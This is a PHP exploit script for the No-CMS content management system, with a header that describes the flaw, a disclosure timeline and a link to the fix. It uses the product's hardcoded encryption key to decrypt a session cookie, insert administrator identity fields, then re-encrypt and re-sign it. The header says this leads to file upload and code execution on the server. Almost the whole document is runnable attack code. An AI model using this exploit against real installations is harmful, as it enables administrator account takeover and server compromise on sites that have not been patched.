* Static encryption_key of No-CMS lead to Session Array Injection in order to
* hijack administrator account then you will be able for upload php files to
* server via theme/module upload.
* This exploit generates cookie for administrator access from non-privileges cookie.
* Full analysis can be found following link.
* http://www.mehmetince.net/codeigniter-based-no-cms-admin-account-hijacking-rce-via-static-encryption-key/
* Apr 21, 2014 at 20:17 PM = Vulnerability found.
* Apr 22, 2014 at 1:27 AM = First contact with no-cms developers.
* Apr 22, 2014 at 1:31 AM = Response from no-cms developer.
* Apr 22, 2014 at 2:29AM = Vulnerability confirmed by developers.
* Apr 22, 2014 at 04:37 = Vulnerability has been patch via following commit.
* https://github.com/goFrendiAsgard/No-CMS/commit/39d6ed327330e94b7a76a04042665dd13f2162bd
define('KEY', 'namidanoregret');
define('KEYWORD', 'session_id');
function log_message($type = 'debug', $str){
    echo PHP_EOL."[".$type."] ".$str;
function show_error($str){
    echo PHP_EOL."[error] ".$str.PHP_EOL;
function _print($str){
    log_message("info", $str.PHP_EOL);
class CI_Encrypt {
    public $encryption_key      = '';
    protected $_hash_type       = 'sha1';
    protected $_mcrypt_exists   = FALSE;
    protected $_mcrypt_cipher;
    protected $_mcrypt_mode;
    public function __construct()
        $this->_mcrypt_exists = function_exists('mcrypt_encrypt');
        log_message('debug', 'Encrypt Class Initialized');
    public function get_key($key = '')
        return md5($this->encryption_key);
    public function set_key($key = '')
        $this->encryption_key = $key;
        return $this;
    public function encode_from_legacy($string, $legacy_mode = MCRYPT_MODE_ECB, $key = '')
        if ($this->_mcrypt_exists === FALSE)
            log_message('error', 'Encoding from legacy is available only when Mcrypt is in use.');
            return FALSE;
        elseif (preg_match('/[^a-zA-Z0-9\/\+=]/', $string))
            return FALSE;
        $current_mode = $this->_get_mode();
        $key = $this->get_key($key);
        $dec = base64_decode($string);
        if (($dec = $this->mcrypt_decode($dec, $key)) === FALSE)
            return FALSE;
        $dec = $this->_xor_decode($dec, $key);
        return base64_encode($this->mcrypt_encode($dec, $key));
    public function _xor_encode($string, $key = '')
        if($key === '')
            $key = $this->get_key();
        $rand = '';
            $rand .= mt_rand();
        while (strlen($rand) < 32);
        $rand = $this->hash($rand);
        $enc = '';
        for ($i = 0, $ls = strlen($string), $lr = strlen($rand); $i < $ls; $i++)
            $enc .= $rand[($i % $lr)].($rand[($i % $lr)] ^ $string[$i]);
        return $this->_xor_merge($enc, $key);
    public function _xor_decode($string, $key = '')
        if($key === '')
            $key = $this->get_key();
        $string = $this->_xor_merge($string, $key);
        $dec = '';
        for ($i = 0, $l = strlen($string); $i < $l; $i++)
            $dec .= ($string[$i++] ^ $string[$i]);
        return $dec;
    protected function _xor_merge($string, $key)
        $hash = $this->hash($key);
        $str = '';
        for ($i = 0, $ls = strlen($string), $lh = strlen($hash); $i < $ls; $i++)
            $str .= $string[$i] ^ $hash[($i % $lh)];
        return $str;
    public function mcrypt_encode($data, $key = '')
        if($key === '')
            $key = $this->get_key();
        $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
        $init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND);
        return $this->_add_cipher_noise($init_vect.mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key);
    public function mcrypt_decode($data, $key = '')
        if($key === '')
            $key = $this->get_key();
        $data = $this->_remove_cipher_noise($data, $key);
        $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
        if ($init_size > strlen($data))
            return FALSE;
        $init_vect = substr($data, 0, $init_size);
        $data = substr($data, $init_size);
        return rtrim(mcrypt_decrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), "\0");
    protected function _add_cipher_noise($data, $key)
        $key = $this->hash($key);
        $str = '';
        for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
            if ($j >= $lk)
                $j = 0;
            $str .= chr((ord($data[$i]) + ord($key[$j])) % 256);
        return $str;
    protected function _remove_cipher_noise($data, $key)
        $key = $this->hash($key);
        $str = '';
        for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
            if ($j >= $lk)
                $j = 0;
            $temp = ord($data[$i]) - ord($key[$j]);
            if ($temp < 0)
                $temp += 256;
            $str .= chr($temp);
        return $str;
    public function set_cipher($cipher)
        $this->_mcrypt_cipher = $cipher;
        return $this;
    public function set_mode($mode)
        $this->_mcrypt_mode = $mode;
        return $this;
    protected function _get_cipher()
        if ($this->_mcrypt_cipher === NULL)
            return $this->_mcrypt_cipher = MCRYPT_RIJNDAEL_256;
        return $this->_mcrypt_cipher;
    protected function _get_mode()
        if ($this->_mcrypt_mode === NULL)
            return $this->_mcrypt_mode = MCRYPT_MODE_CBC;
        return $this->_mcrypt_mode;
    public function set_hash($type = 'sha1')
        $this->_hash_type = in_array($type, hash_algos()) ? $type : 'sha1';
    public function hash($str)
        return hash($this->_hash_type, $str);
$encryption = new CI_Encrypt();
$cookie = rawurldecode("DZyb3lI68zh+RBNg8C4M03TEJhMR4BBMzNWA1YUampWQ6UKaiUhG48rwkdfIs9DJYNQc8pZDniflInnUrQz1FbRxueQ3NLCahBBmrTuw8Ib7OL7ycm/IbuR81WEVrWpYOnQ4Z57/w21OCyVw42TjSkXkfWfN67veJr5630eTBA03vRbvLunZ9RLEuElqNrJu/H63yibCv8fyRWNnKs56i5OuU6Dso11O49k4fhxd008WTvsGliLxiErCkWwYfGfcjUA3V2Mh9mkrLk0YEKIbt3hbNXhAnGhIVIVJURhnmibqEFUacB1gP1GnbP2fQy3NpJt317n/3/sH+jH4lM+53IY1HOJh7n/J6RU9jqMr1hdeslDxFaV7SCuB4vPuO7SScec8063aae4808b195d818d86fda1d280ebb06bd");
$len = strlen($cookie) - 40;
if ($len < 0)
    show_error('The session cookie was not signed.');
// Check cookie authentication
$hmac    = substr($cookie, $len);
$session = substr($cookie, 0, $len);
if ($hmac !== hash_hmac('sha1', $session, KEY))
    show_error('The session cookie data did not match what was expected.');
// Detect target encryption method and Decrypt session
$_mcrypt = $encryption->mcrypt_decode(base64_decode($session));
$_xor = $encryption->_xor_decode(base64_decode($session));
$method = '';
$plain = '';
if (strpos($_mcrypt, KEYWORD) !== false) {
    _print("Encryption method is mcrypt!");
    $method = 'm';
    $plain = $_mcrypt;
} else if (strpos($_xor, KEYWORD) !== false) {
    _print("Encryption method is xor!");
    $method = 'x';
    $plain = $_xor;
} else {
    show_error("something went wrong.");
// Unserialize session string in order to create session array.
$session = unserialize($plain);
_print("Current Session Array :");
// Add extra fields into it
$session['cms_user_name'] = 'admin';
$session['cms_user_id'] = 1;
// Print out payload string.
_print("Payload appended Session Array :");
// Serialize it
$session = serialize($session);
// Encrypt it with same key.
if ($method === 'm')
    $payload = base64_encode($encryption->mcrypt_encode($session));
if ($method === 'x')
    $payload = base64_encode($encryption->_xor_encode($session));
// Calculation of hmac to add it end of the encrypted session string.
$payload .= hash_hmac('sha1', $payload, KEY);
_print("New Cookie");
_print("Use Tamper Data and change cookie then push F5!");